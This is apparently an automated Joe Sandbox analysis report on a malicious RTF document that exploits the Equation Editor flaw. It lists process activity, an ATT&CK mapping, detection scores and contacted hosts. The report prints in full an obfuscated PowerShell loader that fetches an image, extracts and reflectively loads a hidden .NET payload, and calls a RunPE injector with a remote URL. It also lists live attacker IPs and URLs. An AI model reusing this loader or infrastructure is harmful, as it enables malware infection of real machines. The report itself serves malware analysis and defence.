Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 780			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2344			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1812	Thread sleep time: -360000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3180	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3304	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3308	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3280	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3424	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

API call chain: ExitProcess graph end node

graph_2-295

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035106C2 mov edx, dword ptr fs:[00000030h]

2_2_035106C2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 91.92.254.29 80

Jump to behavior

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 3200, type: MEMORYSTR

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS"			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )"			Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command ". ( $verbosepreference.tostring()[1,3]+'x'-join'')( (('94ylink = ykohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235yko; 94ywebclient = new-object system.net.webclie'+'nt; try { 94ydownloadeddata = 94ywebclient.downloaddata(94ylink) } catch { write-host ykofailed to download data from 94ylinkyko -foregroundcolor red; ex'+'it }; if (94ydownloadeddata -ne 94ynull) { 94'+'yimagetext = ['+'system.text.encoding]::utf8.getstring(94ydownload'+'eddata); 94ystartflag = yko<<base64_start>>yko;'+' 94yendflag '+'= yko<<base64_end>>yko; 94ystartindex = 94yimagetext.indexof(94ystartflag); 94yendindex = 94yimagetext.indexof(94yendflag); if (94ystartindex -ge 0 -and 94yen'+'dindex -gt 94ystartind'+'ex) { 94ystartindex += 94ystartflag.length; 94ybase64length = 94yendindex - 94ystartindex; 94ybase64command = 94yimagetext.substring(94yst'+'a'+'rtindex, 94ybase64length); 94ycommand'+'bytes = [sy'+'st'+'em.convert]::fro'+'mbase64string(94ybase64command); 94yloadedassembly = [system.reflection'+'.assembly]::load(94ycommandbytes); 94ytype = 9'+'4yloadedassembly.gettype(ykorunpe.homeyko); 94ymethod = 94ytype.getmethod(ykovaiyko).invoke('+'94ynull, ['+'object[]] (ykotxt.fdw/11033/61.532.59.32//:ptthyko ,'+' ykodesativadoyko , ykodesativadoyko , ykodesati'+'vadoyko,ykoregasmyko,ykoyko)) } }') -creplace 'yko',[char]39 -creplace([char]57+[char]52+[char]89),[char]36) )"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command ". ( $verbosepreference.tostring()[1,3]+'x'-join'')( (('94ylink = ykohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235yko; 94ywebclient = new-object system.net.webclie'+'nt; try { 94ydownloadeddata = 94ywebclient.downloaddata(94ylink) } catch { write-host ykofailed to download data from 94ylinkyko -foregroundcolor red; ex'+'it }; if (94ydownloadeddata -ne 94ynull) { 94'+'yimagetext = ['+'system.text.encoding]::utf8.getstring(94ydownload'+'eddata); 94ystartflag = yko<<base64_start>>yko;'+' 94yendflag '+'= yko<<base64_end>>yko; 94ystartindex = 94yimagetext.indexof(94ystartflag); 94yendindex = 94yimagetext.indexof(94yendflag); if (94ystartindex -ge 0 -and 94yen'+'dindex -gt 94ystartind'+'ex) { 94ystartindex += 94ystartflag.length; 94ybase64length = 94yendindex - 94ystartindex; 94ybase64command = 94yimagetext.substring(94yst'+'a'+'rtindex, 94ybase64length); 94ycommand'+'bytes = [sy'+'st'+'em.convert]::fro'+'mbase64string(94ybase64command); 94yloadedassembly = [system.reflection'+'.assembly]::load(94ycommandbytes); 94ytype = 9'+'4yloadedassembly.gettype(ykorunpe.homeyko); 94ymethod = 94ytype.getmethod(ykovaiyko).invoke('+'94ynull, ['+'object[]] (ykotxt.fdw/11033/61.532.59.32//:ptthyko ,'+' ykodesativadoyko , ykodesativadoyko , ykodesati'+'vadoyko,ykoregasmyko,ykoyko)) } }') -creplace 'yko',[char]39 -creplace([char]57+[char]52+[char]89),[char]36) )"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	211 Scripting	Valid Accounts	11 Command and Scripting Interpreter	211 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	1 Process Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	43 Exploitation for Client Execution	1 DLL Side-Loading	1 DLL Side-Loading	1 Modify Registry	LSASS Memory	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	23 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Install Root Certificate	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
4YlwTsmpuZ.rtf	52%	Virustotal		Browse
4YlwTsmpuZ.rtf	50%	ReversingLabs	Document-RTF.Exploit.CVE-2017-11882
4YlwTsmpuZ.rtf	100%	Avira	HEUR/Rtf.Malformed

Source	Detection	Scanner	Label	Link
uploaddeimagens.com.br	5%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://crl.entrust.net/server1.crl0	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://secure.comodo.com/CPS0	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235YKo;	0%	Avira URL Cloud	safe
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Avira URL Cloud	safe
http://23.95.235.16/33011/greatideaforfollowers.gif	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	Avira URL Cloud	safe
http://uploaddeimagens.com.br	0%	Avira URL Cloud	safe
http://go.micros	0%	Avira URL Cloud	safe
http://23.95.235.16/33011/grJ	0%	Avira URL Cloud	safe
https://www.cloudflare.com/learning/access-management/phishing-attack/	0%	Virustotal		Browse
https://uploaddeimagens.com.br/images/	3%	Virustotal		Browse
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	Virustotal		Browse
https://www.cloudflare.com/5xx-error-landing	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235p	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br	0%	Avira URL Cloud	safe
http://23.95.235.16/33011/greatideaforfollowers.gifj	0%	Avira URL Cloud	safe
https://www.cloudflare.com/5xx-error-landing	0%	Virustotal		Browse
http://23.95.235.16/33011/greatideaforfollowers.gifyyC:	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	Virustotal		Browse
https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br	6%	Virustotal		Browse
http://uploaddeimagens.com.br	5%	Virustotal		Browse
http://23.95.235.1	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235	5%	Virustotal		Browse
http://91.92.254.29/Users_API/syscore/file_xgep41gp.dyp.txt	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
uploaddeimagens.com.br	188.114.96.3	true	true	5%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.95.235.16/33011/greatideaforfollowers.gif	true	Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235	true	5%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	powershell.exe, 00000006.00000002.358503012.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000003015000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/server1.crl0	powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ocsp.entrust.net03	powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235YKo;	powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://uploaddeimagens.com.br/images/	powershell.exe, 00000006.00000002.358383867.00000000004D0000.00000004.00000020.00020000.00000000.sdmp	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://uploaddeimagens.com.br	powershell.exe, 00000006.00000002.358503012.0000000002FAF000.00000004.00000800.00020000.00000000.sdmp	true	5%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://go.micros	powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.16/33011/grJ	EQNEDT32.EXE, 00000002.00000002.346070197.00000000005FF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	powershell.exe, 00000006.00000002.358503012.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.358503012.0000000003015000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235p	powershell.exe, 00000006.00000002.358503012.00000000025B9000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br	powershell.exe, 00000006.00000002.358503012.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp	true	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000006.00000002.359196589.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://23.95.235.16/33011/greatideaforfollowers.gifj	EQNEDT32.EXE, 00000002.00000002.346271165.0000000003510000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.95.235.16/33011/greatideaforfollowers.gifyyC:	EQNEDT32.EXE, 00000002.00000002.346070197.000000000059F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000006.00000002.358503012.0000000002481000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://23.95.235.1	EQNEDT32.EXE, 00000002.00000002.346070197.00000000005DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.92.254.29/Users_API/syscore/file_xgep41gp.dyp.txt	wscript.exe, 00000005.00000002.359992594.0000000000677000.00000004.00000020.00020000.00000000.sdmp, greatideaforfollowers.vBS.2.dr, greatideaforfollowers[1].gz.2.dr	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	powershell.exe, 00000006.00000002.359414442.0000000004FCC000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.92.254.29	unknown	Bulgaria	34368	THEZONEBG	true
23.95.235.16	unknown	United States	36352	AS-COLOCROSSINGUS	true
188.114.96.3	uploaddeimagens.com.br	European Union	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466761
Start date and time:	2024-07-03 11:07:53 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 32s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	4YlwTsmpuZ.rtf renamed because original name is a hash value
Original Sample Name:	9904916ce3549610216e99d83e7e2135.rtf
Detection:	MAL
Classification:	mal100.expl.evad.winRTF@7/12@1/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 91% Number of executed functions: 16 Number of non-executed functions: 9
Cookbook Comments:	Found application associated with file extension: .rtf Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
